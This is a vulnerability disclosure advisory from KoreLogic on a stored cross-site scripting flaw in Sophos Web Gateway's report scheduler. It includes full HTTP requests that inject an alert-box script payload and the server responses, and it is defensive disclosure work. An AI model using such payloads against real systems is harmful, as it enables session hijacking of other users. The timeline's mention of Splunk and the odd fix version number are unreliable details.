Skip to main content
Security Advisory

Sophos Web Gateway Persistent Cross Site Scripting Vulnerability

Advisory ID
KL-001-2018-001
Published
2018-01-26
Vendor
Sophos

Affected Systems

Product
Web Gateway
Version
4.4.1
Platform
Embedded Linux

Discovered By

Matt Bergin (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Gateway
Affected Version: 4.4.1
Platform: Embedded Linux
CWE Classification: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Impact: Arbitrary Code Execution
Attack Vector: HTTP

Vulnerability Description

The report scheduler menu within the management portal contains a persistent cross site scripting vulnerability. This vulnerability can be used to target other users of the same portal.

Technical Description

A valid session is required to create the report with the persistent cross site scripting payload attached. An example attack payload has been included below. This payload is designed to trigger an alert box with the number one being displayed.

    POST /index.php?c=report_scheduler HTTP/1.1
    Host: 1.3.3.7
    Accept-Language: en-US,en;q=0.5
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.6.1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 1190
    DNT: 1
    Connection: close

    action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d
    HTTP/1.1 200 OK
    Date: Sat, 29 Jul 2017 16:05:25 GMT
    Server: Apache
    Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
    Pragma: no-cache
    X-Frame-Options: sameorigin
    X-Content-Type-Options: nosniff
    Connection: close
    Content-Type: text/html; charset=utf-8
    Content-Length: 41

    {"status":0,"statusMsg":"Settings saved"}

The URL-encoded input being passed in input parameter can be decoded to a array containing a single JSON buffer.

[
  {
    "STYLE": "016a16896568739c11955632068abddd",
    "cb_traf_perf": "yes",
    "sb_detailed_policy_count": "1",
    "sb_groups": "sophos_swa_all_departments",
    "rd_schedule": "daily",
    "sb_days": "7",
    "sb_weekly_day": "Monday",
    "txt_schedule_name": "test<script>alert(1);</script>",
    "cb_activate_schedule": "yes",
    "recipients": "test@test.asdasd",
    "schedule_id": "dGVzdA==",
    "owner": "admin"
  }
]

Within the JSON buffer is a key called txt_schedule_name. The value for this key is the name of the scheduled report. This value is included in the report schedule list.

    "txt_schedule_name": "test<script>alert(1);</script>"

The HTML tags are then stored. When the report schedule is viewed, the resulting JSON is sent as content-type text/html instead of application/json, causing the browser to execute any unescaped javascript it contains. The output is HTML-encoded with the exception of the txt_schedule_name: value which is not sanitized, and the payload triggers.

    POST /index.php?c=report_scheduler HTTP/1.1
    Host: 1.3.3.7
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    Accept-Language: en-US,en;q=0.5
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.6.1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 81
    DNT: 1
    Connection: close

    action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd
    HTTP/1.1 200 OK
    Date: Sat, 29 Jul 2017 16:06:38 GMT
    Server: Apache
    Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
    Pragma: no-cache
    X-Frame-Options: sameorigin
    X-Content-Type-Options: nosniff
    Connection: close
    Content-Type: text/html; charset=utf-8
    Content-Length: 1365

    {"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test&lt;script&gt;alert(1);&lt;\/script&gt;\"><div class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\" title=\"test&lt;script&gt;alert(1);&lt;\/script&gt;\">test&lt;script&gt;alert(1);&lt;\/script&gt;<\/a><\/div><div class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test&lt;script&gt;alert(1);&lt;\/script&gt;\" name=\"on_off_test&lt;script&gt;alert(1);&lt;\/script&gt;\" class=\"button small\"><span class=\"buttonLabel small\" id=\"on_off_span_test&lt;script&gt;alert(1);&lt;\/script&gt;\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input type=\"checkbox\" id=\"chk_test&lt;script&gt;alert(1);&lt;\/script&gt;\"\/><\/div><\/li><\/ul>"}

Mitigation and Remediation Recommendation

The vendor has released version 4.3.3.1 of the Web Gateway which addresses this issue. Release notes available at:

http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Disclosure Timeline

KoreLogic submits vulnerability details to Sophos.

Sophos confirms receipt.

30 business days have elapsed since the vulnerability was reported to Sophos.

KoreLogic requests an update from Sophos.

Sophos informs KoreLogic that they will issue a fix in the next maintenance release, scheduled for the end of November. Sophos asks KoreLogic to hold disclosure until the new version is released.

45 business days have elapsed since the vulnerability was reported to Splunk.

Sophos notifies KoreLogic that the maintenance release has gone live.

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Contact Security Team
All Advisories Download signed .txt